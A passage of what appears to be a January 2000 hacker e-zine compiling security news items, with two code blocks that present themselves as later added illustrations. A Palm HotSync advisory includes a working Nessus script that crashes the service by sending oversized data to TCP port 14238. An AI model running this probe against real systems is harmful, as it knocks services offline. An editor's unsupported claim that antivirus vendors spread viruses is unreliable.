To turn e-mail delivery back on use the command:
SET SF-NEWS MAIL

4. Is the list available in a digest format?
Yes. The digest is generated once a day.

5. How do I subscribe to the digest?
To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with a message body of:
SET SF-NEWS DIGEST

6. How do I unsubscribe from the digest?
To turn the digest off send a message to LISTSERV with a message body of:
SET SF-NEWS NODIGEST
If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next.

7. I seem to not be able to unsubscribe. What is going on?
You are probably subscribed from a different address than the one from which you are sending commands to LISTSERV. Either send email from the appropriate address or email the moderator to be unsubscribed manually.

@HWA

35.0 HNN: Jan 17: NY Student Arrested After Damaging School Computer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
A high school student in Long Island, New York has been arrested for electronically breaking into his school's computer system. He has been charged with computer tampering and unauthorized use of a computer. Police say that he was caught after bragging about the intrusion to friends and teachers. Damage was estimated at $3,000.

WABC News
http://abcnews.go.com/local/wabc/news/32275_1142000.html

High School Hacker Arrested

Long Island authorities have arrested a 17-year-old high school student for hacking into his school district's computer. Suffolk County authorities are charging Keith Billig with computer tampering and unauthorized use of a computer. Billig is a student at Hauppauge High School.
On Wednesday, authorities say Billig gained access to the school district's mainframe computer. He allegedly was able to attain the password of every administrator, teacher and student in the district. The computer's internal security system was able to detect Billig's intrusion in the early stages. Police say Billig's bragging about his exploits to teachers and other students is what led them to him.

Authorities are not sure what Billig's motive for breaking into the computer system was. Authorities estimate the damage done to the school district's computer system at $3,000.

@HWA

Where do these guys get these figures from? Any sysadmin worth his salt can secure the system in less than an hour... do they get paid $3k/hr down there?? - Ed

36.0 HNN: Jan 17: NSA Wants A Secure Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Benjamin
The NSA has contracted Secure Computing as a sole source provider for a new Linux based secure OS. Secure Computing will integrate the patented Type Enforcement technology it uses for the Sidewinder firewall at the OS level. The technology is scheduled to be made available to the public as well as the NSA.

PR Newswire - via Yahoo
http://biz.yahoo.com/prnews/000113/ca_secure__1.html

Thursday January 13, 8:02 am Eastern Time

Company Press Release

SOURCE: Secure Computing Corporation

National Security Agency Selects Secure Computing to Provide Type Enforcement(TM) on Linux OS

Secure Computing First to Develop Strong Security Platform for Linux

SAN JOSE, Calif., Jan. 13 /PRNewswire/ -- Secure Computing Corporation (Nasdaq: SCUR - news), today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology to develop a robust and secure Linux platform.
This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications. The NSA is the nation's high-technology cryptologic organization that ensures important and sensitive activities in the US intelligence community are protected from exploitation through interception, unauthorized access, or related technical intelligence threats.

Secure Computing's patented Type Enforcement technology provides network security protection that is unique to the industry. This technology, first developed under previous government contracts, is available today as part of the UNIX OS for Secure Computing's Sidewinder(TM) firewall. Type Enforcement secures underlying operating systems and protects applications and network services, by segmenting them into domains. Each domain is granted permission to access only specific file types, including executables. As such, each domain provides a self-contained, discrete layer of protection that cannot be altered. Implementing Type Enforcement within the operating system itself assures the highest level of security available in commercial operating systems.

"The NSA has been a long standing customer and partner of Secure Computing," said Chris Filo, vice president and general manager of the Advanced Technology Division at Secure Computing. "Working with the NSA allows Secure to continue to advance the state of the art in security technologies that is required to enable safe, secure operating environments within the Department of Defense (DoD), while at the same time, providing the basis for our future commercial products."

Linux is a UNIX-type operating system that includes true multitasking, virtual memory, shared libraries, demand loading, proper memory management, TCP/IP networking, and other features consistent with Unix-type systems. The Linux source code is freely available to everyone.
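The domain/type model the press release describes (processes confined to domains, each domain allowed only specific file types, executables included) can be made concrete with a small policy checker. What follows is an added illustration of that access-control idea, not Secure Computing's code and not how Sidewinder or its Linux port implement Type Enforcement; the domain names, type names, policy rules and sample requests are all constructed for the example. The point it makes is the one the release makes: the decision never looks at who the process runs as, so a compromised web server that still "is root" gets nowhere outside its domain.

```python
"""Toy Type Enforcement checker (constructed example, not Secure Computing's code).

Every process runs in a domain, every file carries a type, and a policy
table lists the permissions each domain holds on each type.  Anything the
table does not mention is denied.  User identity never enters the decision,
which is what confines a service that has been taken over.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Subject:
    name: str
    domain: str      # domain label of the running process, e.g. "httpd_d" (hypothetical)


@dataclass(frozen=True)
class Obj:
    path: str
    ftype: str       # type label on the file, e.g. "web_content_t" (hypothetical)


def allow(policy, domain, ftype, *perms):
    """Add an allow rule.  Rules only ever widen access; there is no 'deny' rule."""
    key = (domain, ftype)
    policy[key] = policy.get(key, frozenset()) | frozenset(perms)


def check(policy, domain, ftype, perm):
    """Default deny: access is granted only if an explicit rule covers it."""
    return perm in policy.get((domain, ftype), frozenset())


def build_policy():
    """Constructed policy; the domain and type names are made up for this example."""
    policy = {}
    # The web server may execute its own binary, read content and append to its log.
    allow(policy, "httpd_d", "httpd_exec_t", "execute")
    allow(policy, "httpd_d", "web_content_t", "read")
    allow(policy, "httpd_d", "httpd_log_t", "append")
    # Only the administrator's domain touches the password file, edits content
    # or may launch a shell.
    allow(policy, "admin_d", "shadow_t", "read", "write")
    allow(policy, "admin_d", "shell_exec_t", "execute")
    allow(policy, "admin_d", "web_content_t", "read", "write")
    return policy


def evaluate(policy, requests):
    """Split (subject, object, permission) requests into granted and denied audit lines."""
    granted, denied = [], []
    for subj, obj, perm in requests:
        line = f"{perm:<7} {subj.name}[{subj.domain}] -> {obj.path}[{obj.ftype}]"
        target = granted if check(policy, subj.domain, obj.ftype, perm) else denied
        target.append(line)
    return granted, denied


def demo():
    """A web server acting outside its role is stopped by the policy, not by its uid."""
    policy = build_policy()
    httpd = Subject("httpd", "httpd_d")
    admin = Subject("sysadmin", "admin_d")
    index = Obj("/var/www/index.html", "web_content_t")
    log = Obj("/var/log/httpd/access_log", "httpd_log_t")
    shadow = Obj("/etc/shadow", "shadow_t")
    shell = Obj("/bin/sh", "shell_exec_t")
    requests = [
        (httpd, index, "read"),      # normal service: serve a page
        (httpd, log, "append"),      # normal service: log the hit
        (httpd, shadow, "read"),     # outside the web domain's role: denied
        (httpd, shell, "execute"),   # outside the web domain's role: denied
        (httpd, index, "write"),     # read-only type for this domain: denied
        (admin, shadow, "read"),     # the administrator's domain is allowed this
    ]
    return evaluate(policy, requests)


if __name__ == "__main__":
    ok, bad = demo()
    print("granted:", *ok, sep="\n  ")
    print("denied:", *bad, sep="\n  ")
```

A real TE system adds domain transitions (which domain a process enters when it executes a given type) and labels sockets and devices as well as files; the table-lookup core is the same.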
About the National Security Agency

The National Security Agency (NSA) is the nation's cryptologic organization, tasked with making and breaking codes and ciphers. NSA is a high-technology organization, working on the very frontiers of communications and data processing. The expertise and knowledge it develops provide the government with systems that deny foreign powers knowledge of US capabilities and intentions. The NSA is charged with two of the most important and sensitive activities in the US intelligence community. The information systems security or INFOSEC mission provides leadership, products, and services to protect classified and unclassified national security systems against exploitation through interception, unauthorized access, or related technical intelligence threats. The second activity is the foreign signals intelligence or SIGINT mission, which allows for an effective, unified organization and control of all the foreign signals collection and processing activities of the United States.

About Secure Computing

Headquartered in San Jose, California, Secure Computing Corporation is a global leader in providing safe, secure extranets for e-business. Secure Computing solutions provide authentication, authorization and secure network access. Secure Computing's worldwide partners and customer base are counted among the Fortune 50 in financial services, healthcare, telecom, communications, manufacturing, technology and Internet service providers, as well as some of the largest agencies of the United States government. For more information, visit Secure Computing Corporation at www.securecomputing.com, or by calling: in Europe, 44-1753-826000; in Asia/Pacific, 61-2-9844-5440; in the U.S., 800-379-4944, or 408-918-6100.

NOTE: All trademarks, tradenames or service marks used or mentioned herein belong to their respective owners.
This press release contains forward-looking statements relating to the anticipated delivery of Secure Computing's Type Enforcement technology on the Linux operating system and the expected benefits of such technology, and such statements involve a number of risks and uncertainties. Among the important factors that could cause actual results to differ materially from those indicated by such forward-looking statements are delays in product development, competitive pressures, technical difficulties, changes in customer requirements, general economic conditions and the risk factors detailed from time to time in Secure Computing's periodic reports and registration statements filed with the Securities and Exchange Commission.

SOURCE: Secure Computing Corporation

@HWA

37.0 HNN: Jan 17: Cryptome may be breaking the law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Cryptome May Be Violating the Law

contributed by White Vampire
Leading Internet civil liberties groups said today that new encryption export regulations released by the U.S. Commerce Department fall short of the Clinton Administration's promise to deregulate the privacy-enhancing technology. One example of this concerns the popular Internet site Cryptome, where PGP is made freely available to anyone in the world who wants it. It is unclear under the new regulations whether this is a criminal act or not.

Wired
http://www.wired.com/news/politics/0,1283,33672,00.html

Is This Man a Crypto Criminal?
by Declan McCullagh

3:00 a.m. 15.Jan.2000 PST

Crypto maven John Young has a problem. He may be a felon, guilty of a federal crime punishable by years in prison. Or he may not be. He'd just like to know one way or another.

The 63-year-old architect and owner of the popular Cryptome site has posted a copy of PGP (Pretty Good Privacy) encryption software for the world to download.
PGP, an encryption program that lets users scramble files and email, has become one of the most popular crypto applications online. But people living outside the US have not been able to get it legally from a US Web site.

Young's seemingly innocuous act might violate new US government regulations that restrict placing privacy-protecting crypto programs on the Web. Therein lies the uncertainty. The rules are much less onerous than the previous version, but they still apply. And they're so labyrinthine and convoluted that even lawyers who specialize in the area declined to guess whether or not Young has run afoul of President Clinton's executive order and Commerce Department regulations.

"The fact that questions still remain about what does and does not violate the law demonstrates that these regulations continue to cloud the situation," said David Sobel, general counsel of the Electronic Privacy Information Center.

So Young decided to be intrepid -- and perhaps risk a confrontation with the Feds. "If it's not right, someone will tell me. If I go to a lawyer to ask, they'll advise caution. Every time I go to a lawyer they advise me not to do it, so I don't go any more," he said.

The Department of Commerce, which published the regulations and is in charge of arresting crypto-miscreants, declined to comment. Eugene Cottilli, a spokesman for the Commerce's bureau of export administration, could not secure an official response from government lawyers on Friday.

Complicating matters is the different way that the regulations treat ready-to-use binary software, and the human-readable source code that must be compiled to be used.

On Friday, Young posted a copy of PGP Freeware Version 6.5.2a for Windows and Macintosh, which contains binary code.
The regulations appear to say that Americans can only distribute it online if the government has previously "reviewed and classified" the software as acceptable for distribution.

Under the old rules, Web sites could distribute binary code only if they checked the Internet address of the recipient and attempted to verify that it was a computer inside the US. MIT, which makes PGP available, has a system that does just that.

But Young's site doesn't include the foreigner-verification check, and he said overseas visitors have already been downloading the software.

The uncertainty -- and possibility of criminal prosecution -- doesn't faze Young. "People are saying the regs are deliberately vague so you'll censor yourself, so I tend to go the other way," he said. "I'm hoping this will lead to clarification."

Source code, on the other hand, is a bit freer. As long as it's not subject to an onerous license and as long as you email the site's address to the Commerce Department, Web posting appears to be permitted.

Some cryptographers have already done just that. "I'm willing to give it a try," wrote cryptographer Wei Dai on an encryption mailing list. "I sent an email to BXA [Bureau of Export Administration] and got no reply. The rules do not say I need permission, just notification, so Crypto++ is now available for unrestricted download."

Dai maintains the Crypto++ library of C++ encryption routines, including authentication programs and ciphers. Soon after, the text of the Electronic Frontier Foundation's Cracking DES book appeared online.

http://www.shmoo.com/crypto/Cracking_DES

@HWA

38.0 HNN: Jan 21: H4g1s Member Sentenced to Six Months
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by extension
Jason Mewhiney, the Canadian who defaced a NASA web page back in 1997, has been sentenced to 6 months in prison and ordered to pay a $6000 fine.
Mewhiney pleaded guilty to 12 of the 51 charges against him, including committing mischief to data stored and fraudulent use of a NASA computer system. NASA estimated the damages caused by the intrusion at $70,000. (And how much did it cost to prosecute the case?)

Canadian Press - via Yahoo
http://ca.dailynews.yahoo.com/ca/headlines/cpress/tc/story.html?s=v/ca/cpress/20000118/tc/technology_461022_1.html

Monday January 17 11:48 PM ET

Man sentenced to six months in jail after pleading guilty to computer hacking

SUDBURY, Ont. (CP) - A man was sentenced to six months in jail and fined $6,000 Monday after pleading guilty to computer hacking related charges, including altering NASA's Web site.

Jason Mewhiney, 22, went into the space agency's Web site March 5, 1997, leaving a message that called for an end to the commercialization of the Internet and freedom for two hackers in jail for computer crimes.

Justice John Poupore compared Mewhiney's actions to that of a "safecracker" trying to steal money from a bank.

"Mr. Mewhiney, you ought not to leave this courtroom with a badge of honour in the computer community," the judge said Monday. "You sir, are a convicted criminal. That is a distinction you will carry with you for the rest of your life. It is nothing to be proud of."

Mewhiney, of Val Caron, outside of Sudbury, pleaded guilty to 12 of the 51 charges he was facing, including committing mischief to data stored and fraudulent use of a NASA computer system.

He was able to access dozens of computer systems by using programs that crack password codes.

The space agency's home page was put briefly out of service for repair, at an estimated cost of $70,000. NASA and FBI computer crime teams caught Mewhiney by tracing his movements.

Mewhiney told the court he was sorry. "I'd just like to say I'm sorry and I'm sorry for everyone's time I've wasted," he said.

RCMP searched his parents' home in the spring of 1998 and found a paper with numerous computer system passwords on it.
The judge agreed to a request by assistant Crown attorney Patricia Moore that Mewhiney's computer and other papers seized by police be confiscated. One of his probation conditions was that he not possess a computer.

(Sudbury Star)

© The Canadian Press, 2000

@HWA

39.0 HNN: Jan 21: Smurf Attack Felt Across the Country
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dark Knight
A small ISP in Seattle WA, Oz.net, suffered a major Smurf attack last weekend that was felt across the country. The denial of service attack is estimated to have been launched from 2000 systems nationwide. 70% of the traffic in the Washington State area was said to have been affected.

MSNBC
http://www.msnbc.com/local/KING/483728.asp

404 my dr00gies, sorry article unavailable...

@HWA

40.0 HNN: Jan 21: CIHost.com Leaves Customer Info On the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
CIHost.com, a web hosting company based in Texas, left over 1500 customer records available on the internet for anyone with a web browser to read. CIHost said that the database had been moved to a server so an outside developer could have access to the information, and by mistake password protection was omitted. The customer records included information such as name, credit card type, credit card number, and the amount charged.

MSNBC
http://www.msnbc.com/news/360102.asp

(fuck MSNBC and their bullshit page design)

@HWA

41.0 HNN: Jan 21: False Bids Submitted, Hackers Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
False bids on an online auction for a dinosaur skeleton have been blamed on 'hackers'. False bids of up to $15 million were submitted by people with names such as 'stevebert' and 'dumbass507'.
The bidding procedure has been revamped to prevent this from occurring again, however no details were given as to exactly what security measures were put in place. (It is amazing how many different definitions of the word 'hacker' exist.)

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_608000/608634.stm

Tuesday, 18 January, 2000, 17:52 GMT

Hackers attack dinosaur auction

[Photo caption: Dinosaur hunters with their quarry: Alan Detrich (left) and Fred Nuss]

By BBC News Online's Damian Carrington

An online auction for a complete Tyrannosaurus rex skeleton was attacked by malicious hackers on Tuesday who filed 17 false bids. At least six of these made it through security measures specifically put in place to prevent such action.

"Some people found a way around that process and they have been removed," confirmed Brian Payea, public relations manager for Lycos. He told BBC News Online: "There are no valid bids so far."

Bank chat

The first attempt to auction the 11-metre fossil dinosaur on eBay was scuppered by prank bids of up to $8m. However, this time, the new auctioneers Lycos Auction had teamed up with the website millionaire.com to try to verify the wealth of bidders before they made their offer.

Mr Payea described what should have happened: "You fill in a form, that is sent to millionaire.com and they review it and have a conversation with your bank. The approval is given and someone can bid."

However, hackers named "mrmanson20", "stevebert" and "dumbass507" found a hole and posted bids of up to $15m, well over the reserve price of $5.8m.

No credit compromise

Mr Payea declined to give details of what happened: "How the whole process works is proprietary and I'm not going into detail about it. But we are very confident it couldn't be done again."

He added that: "The hiccup does not compromise anybody's credit information - that is all encrypted and very secure."
The auction opened on Monday but Mr Payea was not concerned that no verified bids had yet been received: "It takes at least 24 hours for the approval process to be completed. In any case, I think it will take people a little while to commit to that kind of purchase - if it was me, I'd be having a chat with an accountant or two before I bid."

Million dollar bones

Even the reserve price may appear high but in 1997 a T. rex was bought for $8.36m by the Field Museum in Chicago, US.

The deal on this skeleton does include delivery from its current home in a Kansas warehouse. However, the bones are only partly exposed from the rock blocks in which they were found.

The 65 million-year-old fossil was discovered on a South Dakota cattle ranch in 1992. Owner Alan Detrich says he sees nothing wrong with auctioning off a piece of the Earth's history. After all, he said, he spent more than $250,000 of his own money unearthing the dinosaur. And he will give 10% of the proceeds to the owners of the cattle ranch where the rock-encased skeleton was found, he says.

"This auction is open to the world. If we don't have the right to (sell the fossil), then we don't live in America. If we didn't go there and get him, he'd still be up there."

Mr Detrich added that he does not mind if his T. rex becomes a corporate mascot or is sold to a private collector with no intention of displaying it publicly.

Chuck Schaff, at the Museum of Comparative Zoology at Harvard University, said the fossil would be ideal for drawing crowds to a museum, but was probably too expensive for most.

"It's not unethical to sell it, it's just a shame it goes to the highest bidder," Mr Schaff says. "Some specimens do get away from scientists, but that's life. It's sad, though."

The auction, which began on Monday, is due to close at 0100 GMT on 11 February 2000.
@HWA

42.0 HNN: Jan 21: UK to create cyber force
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by deepquest
The UK National Criminal Intelligence Service (NCIS) has been assigned £337,000 to draw up plans for establishing a cyber crime squad. This online cyber force will be used to combat online fraud, money laundering, distributing pornography and information about pedophilia, and electronic intrusions.

The Guardian Unlimited
http://www.newsunlimited.co.uk/uk_news/story/0,3604,123365,00.html

'Cyberforce' to fight online crime

Monday January 17, 2000

A national "cyberforce" of computer specialists is to be established by the home office to police the internet and combat a rising tide of online crime.

It was confirmed last night that the home secretary, Jack Straw, has assigned £337,000 to the UK National Criminal Intelligence Service (NCIS) to draw up plans for establishing a squad to counter criminal activity on the web.

The move, which will target those using computers for fraud, money laundering, distributing pornography and information about paedophilia, and hacking, follows a three-year NCIS study of internet crime which concluded that illegal activity on the web, from email viruses to cyber-stalking, is increasing as the wired population grows.

Operation Trawler highlighted the inadequacies of anti-computer crime units, leading to calls for a dedicated organisation. The new unit is expected to include experts in the private sector, the Inland Revenue and police. It will also draw on resources available through links with MI5 and GCHQ - the government agency that eavesdrops on Britain and the world's communications networks.

Roger Gaspar, the director of intelligence at NCIS, and David Phillips, the chief constable of Kent and head of the crime committee at the Association of Chief Police Officers, are drawing up plans for the unit, which will also make use of links with American intelligence organisations and the FBI.
Barry McIntyre

@HWA

43.0 HNN: Jan 21: Army Holds Off Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
System Administrators at Redstone Arsenal in Alabama are proud that they withstood the Y2K onslaught of cyber intruders. However, they go on to admit that in the past three months Redstone has been hit with 17 denial of service attacks of which twelve succeeded, and that they have had three web sites breached in the last year. (The interesting part of this article is at the end where the administrator admits that his network has a single point of failure.)

Government Executive Magazine
http://www.govexec.com/dailyfed/0100/012100j1.htm

January 21, 2000

DAILY BRIEFING

Army outpost held off hackers in New Year's showdown

By Joshua Dean
jdean@govexec.com

Shortly after dark on New Year's Day, the pager on the belt of Steve Carey, chief of information assurance at the Army's Redstone Arsenal in Alabama, went off. The message was alarming: a hacker was trying to crack into a critical server that keeps track of network identities and passwords at the arsenal.

When Carey got to the arsenal's network management center, he found the system protections had withstood the attack and all was well. But Carey and his staff couldn't rest. Attackers continued trying to breach the arsenal's computers and its Web sites as the new millennium dawned.

Some other government sites were spared attacks during the New Year's holiday, even though they had braced for the worst. But Redstone is a particularly attractive target for high-tech bandits. The arsenal has technical information on 14 of the Army's top 29 weapons systems, including missiles, helicopters and conventional aircraft. It also handles about 63 percent of the Army's foreign military sales. This means transfers of money as well as weapons technology.

"It's big bucks," said Col. Douglas S. Brouillette, who heads the arsenal's Intelligence and Security Directorate.

As a result, security experts in Redstone's Local Computer Incident Response Team (LCIRT) are constantly vigilant and in many ways ahead of other agencies when it comes to handling network attacks. LCIRT uses a number of computer intrusion detection systems. But even places such as Redstone, where computer security is a high priority, can't get all the technology resources they need. So instead of relying entirely on technology, the arsenal depends on people to remain alert against attacks.

"We have a high level of monitoring because we don't have all the firewalls we need installed yet. We hope the monitoring compensates for that," Brouillette said. "Monitoring allows us to detect, immediately react and fix attacks until we get all the firewalls and other security products installed."

Redstone's basic defense is to find attacks quickly in order to stop them as they happen, he said. Contract analysts from Intergraph Federal Systems serve with Carey on his defense team.

Redstone needs all the help it can get, because its networks are peppered with attacks daily. "We've had hundreds of incidents in the last three-month period," Brouillette said. "That's 3,000 to 4,000 scans of the network."

Hackers conduct scans to try to find out what hardware and software are present on a given network. Scans can discover computers or even modems with open links to the Internet. Unknown hackers who appeared to be from countries including Bulgaria, China, Hungary, Israel, Latvia, Lithuania, Macedonia, Poland, Portugal, Romania and Russia have scanned Redstone over the past three months. But because hackers can make it look as if they were on a computer in a different country, pinning them down geographically is an imperfect science.

Once the reconnoitering is complete, hackers try to exploit vulnerabilities and gain access to private networks and the information stored there.
Without intrusion detection systems and expertise, network staff may never know they've been hacked. Beyond scanning and attempted break-in, hackers can cripple networks and servers by launching "denial-of-service" attacks. In such incidents, intruders launch a flood of messages to a single server, overwhelming it. Denial of service attacks have become so commonplace that they come with colorful names, such as Ping Flood, SMURF, SYN Flood, UDP Bomb and WinNuke. Over the past three months Redstone has been hit with 17 denial of service attacks. Twelve of them succeeded. And then there are the vandals—Internet gang members armed with digital spray paint—that LCIRT must contend with. "Three of our Web sites have been breached in the past 12 months," Carey said. In the successful attacks, the methods were new to the network defenders, which meant the attackers were able to change the Web sites. Once LCIRT members discovered how the hackers pulled off the attacks, they went through every base Web server to make sure vulnerabilities were fixed. Because of past vigilance, the New Year's vandals failed to make a dent. LCIRT members say new attacks and techniques are constantly appearing, and the only way to stop them is to have a team monitoring the network and the logs of the intrusion detection systems. That's how the arsenal's defenders knew the New Year's hackers were aiming deliberately for one of Redstone's most sensitive servers. "If you get into that server you can go anywhere in the installation," Brouillette said, breathing a sigh of relief now that 2000 is well under way and his servers are intact @HWA 44.0 HHN: Jan 24: French smart card expert goes to trial ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by sian An expert in smart card technology has been arrested and faces up to seven years in jail, and a fine of £500,000 after he designed a fake smart card that could be used to defraud 'any cash terminal'. 
Serge Humpich then offered the spoofed card to French banks in exchange for £20 million. The banks accused him of blackmail.

The UK Register
http://www.theregister.co.uk/000123-000005.html

(using some sucky html that fucks up c&p)

@HWA

45.0 HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by kingpin

We don't usually cover individual security vulnerabilities here at HNN but this one is interesting. The Palm HotSync Manager is vulnerable to a DoS attack which may also crash the system and possibly allow the execution of arbitrary code. Anyone who runs HotSync Manager over the network is a potential target of attack.

Beyond-Security's SecuriTeam
http://www.securiteam.com/exploits/Palm_HotSync_Manager_is_vulnerable_to_Denial_of_Service_attack.html

Title
Palm HotSync Manager is vulnerable to Denial of Service attack

Summary
HotSync Manager provides network synchronization between the Palm Desktop and a remote Palm PDA that is connected via the Internet. This feature is used to backup the information from the Palm PDA to a secure location. However, using HotSync Manager over the network exposes it to an attack, where anyone with network connection to the station running HotSync Manager can crash the application and possibly execute arbitrary code.

Details
Vulnerable systems: HotSync Manager 3.0.4 under Windows 98
Non vulnerable systems: HotSync Manager 3.0.4 under Windows 2000

Exploit:
By connecting to the HotSync Manager's TCP listening port (TCP port 14238), and sending a large amount of data followed by a newline, it is possible to crash the HotSync Manager.

The following Nessus Plugin can be used to test this:

#
# This script was written by Noam Rathaus <noamr@securiteam.com>
#
# See the Nessus Scripts License for details
#
#

if(description)
{
 name["english"] = "HotSync Manager Denial of Service attack";
 script_name(english:name["english"]);

 desc["english"] = "It is possible to cause HotSync Manager to crash
by sending a few bytes of garbage into its listening port TCP 14238.

Solution: Block those ports from outside communication

Risk factor : Low";

 script_description(english:desc["english"]);

 summary["english"] = "HotSync Manager Denial of Service attack";
 script_summary(english:summary["english"]);

 # ACT_DENIAL marks this as a test that may take the service down,
 # so Nessus only runs it when denial-of-service checks are enabled.
 script_category(ACT_DENIAL);

 script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
 family["english"] = "Windows";
 script_family(english:family["english"]);
 exit(0);
}

#
# The script code starts here
#

if (get_port_state(14238))
{
 sock14238 = open_sock_tcp(14238);
 if (sock14238)
 {
  # 4096 bytes of filler followed by a newline, then give the
  # listener a few seconds and see whether it still accepts connections.
  data_raw = crap(4096) + string("\n");
  send(socket:sock14238, data:data_raw);
  close(sock14238);
  sleep(5);
  sock14238_sec = open_sock_tcp(14238);
  if (sock14238_sec)
  {
   # Listener survived: only report that the port is exposed.
   security_warning(port:14238, data:"HotSync Manager port is open.");
   close(sock14238_sec);
  }
  else
  {
   # Listener is gone: the crash reproduced.
   security_hole(port:14238);
  }
 }
}

Additional information
3Com's Palm computing team is aware of the problem and will fix this issue in the next release of the HotSync Manager.
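The advisory above describes the classic shape of this bug class: a network listener that reads a newline-terminated line without bounding how much it will accept first. As an added example (not SecuriTeam's script and not 3Com's HotSync code), here is a line reader a service can use so that a probe of the advisory's shape, filler bytes followed by a newline, is rejected and the peer dropped instead of crashing the process. The 256-byte limit, the chunk size and the function names are assumptions for illustration, since the advisory doesn't state HotSync's actual root cause.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Upper bound on one newline-terminated request line (excluding the NUL).
 * Assumed value for illustration; the real HotSync wire format is not
 * documented in the advisory. */
#define MAX_LINE 256

enum line_status {
    LINE_OK,        /* a complete line is in buf */
    LINE_NEED_MORE, /* no newline yet, keep reading */
    LINE_TOO_LONG   /* limit hit before a newline: drop the peer */
};

struct line_reader {
    char buf[MAX_LINE];
    size_t len; /* bytes accumulated so far for the current line */
};

void reader_init(struct line_reader *r)
{
    r->len = 0;
    r->buf[0] = '\0';
}

/* Feed bytes as they arrive from the socket. On LINE_OK, r->buf holds the
 * line (newline stripped, NUL-terminated) and *consumed says how many bytes
 * of chunk were used, so the caller can re-feed any leftover. The length
 * check happens before every store, so 4096 bytes of filler, as in the
 * advisory's probe, are rejected long before they could overrun buf. */
enum line_status reader_feed(struct line_reader *r, const char *chunk,
                             size_t n, size_t *consumed)
{
    for (size_t i = 0; i < n; i++) {
        char c = chunk[i];
        if (c == '\n') {
            r->buf[r->len] = '\0';
            r->len = 0;
            *consumed = i + 1;
            return LINE_OK;
        }
        if (r->len >= MAX_LINE - 1) { /* no room for this byte plus NUL */
            r->len = 0;
            *consumed = i;
            return LINE_TOO_LONG;
        }
        r->buf[r->len++] = c;
    }
    *consumed = n;
    return LINE_NEED_MORE;
}

/* Drive the reader over a whole byte stream in fixed-size chunks, the way a
 * socket read loop delivers data. Returns the number of complete lines
 * accepted, or -1 if the peer was disconnected for an over-long line. */
int handle_stream(const char *data, size_t n, size_t chunk)
{
    struct line_reader r;
    reader_init(&r);
    int lines = 0;
    size_t pos = 0;
    while (pos < n) {
        size_t avail = (n - pos < chunk) ? n - pos : chunk;
        size_t used = 0;
        enum line_status st = reader_feed(&r, data + pos, avail, &used);
        pos += used;
        if (st == LINE_TOO_LONG)
            return -1;
        if (st == LINE_OK)
            lines++;
        /* LINE_NEED_MORE: the whole chunk was consumed, read the next one */
    }
    return lines;
}

/* Build a probe of the advisory's shape (filler bytes, then a newline) and
 * report handle_stream's verdict: line count, or -1 when the peer is dropped. */
int probe_verdict(size_t filler_bytes, size_t chunk)
{
    char *probe = malloc(filler_bytes + 1);
    if (!probe)
        return -2;
    memset(probe, 'A', filler_bytes); /* constructed filler, like crap(4096) */
    probe[filler_bytes] = '\n';
    int verdict = handle_stream(probe, filler_bytes + 1, chunk);
    free(probe);
    return verdict;
}

int main(void)
{
    printf("10 bytes + newline   : %d\n", probe_verdict(10, 1024));   /* 1: accepted */
    printf("4096 bytes + newline : %d\n", probe_verdict(4096, 1024)); /* -1: dropped */
    return 0;
}
```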
@HWA

46.0 HNN: Jan 24: Viruses Cost the World $12.1 Billion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HWA Comment: I'll say this as a RUMOUR or MYTH in order to avoid possible libel charges but it was a well known fact that certain (very well known and established) Anti-Virus vendor(s) ran underground BBS's (dial up bulletin boards) in the 80's and later special backdoored FTP sites in the 90's for the purpose of virus authors to upload new viruses to be deployed into the wild so that the AV companies could capitalize on these new 'threats'....so when I read about costs like this I really wonder how much was premeditated by the AV companies themselves in order to make a buck from susceptible companies and people that refused to practice safe computing....trust no one, except maybe AVP. You can debate this if you like but I know it is fact, I was there and had access to these sites. - (HWA Trusted source)

From HNN http://www.hackernews.com/

contributed by nvirb

According to a recent study conducted by Computer Economics, a California based computer consulting firm, the world spent $12.1 billion last year in a war against malicious self replicating code. The $12.1 Billion figure is based on lost productivity, network downtime and the expense involved in getting rid of the virus. (Hmmmm, that number seems ridiculously large.)

APB News
http://www.apbnews.com/newscenter/internetcrime/2000/01/20/virus0120_01.html

Computer Viruses Cost $12 Billion in 1999
Report Tallies Business Impact of 'Economic Terrorism'

Jan. 20, 2000

By David Noack

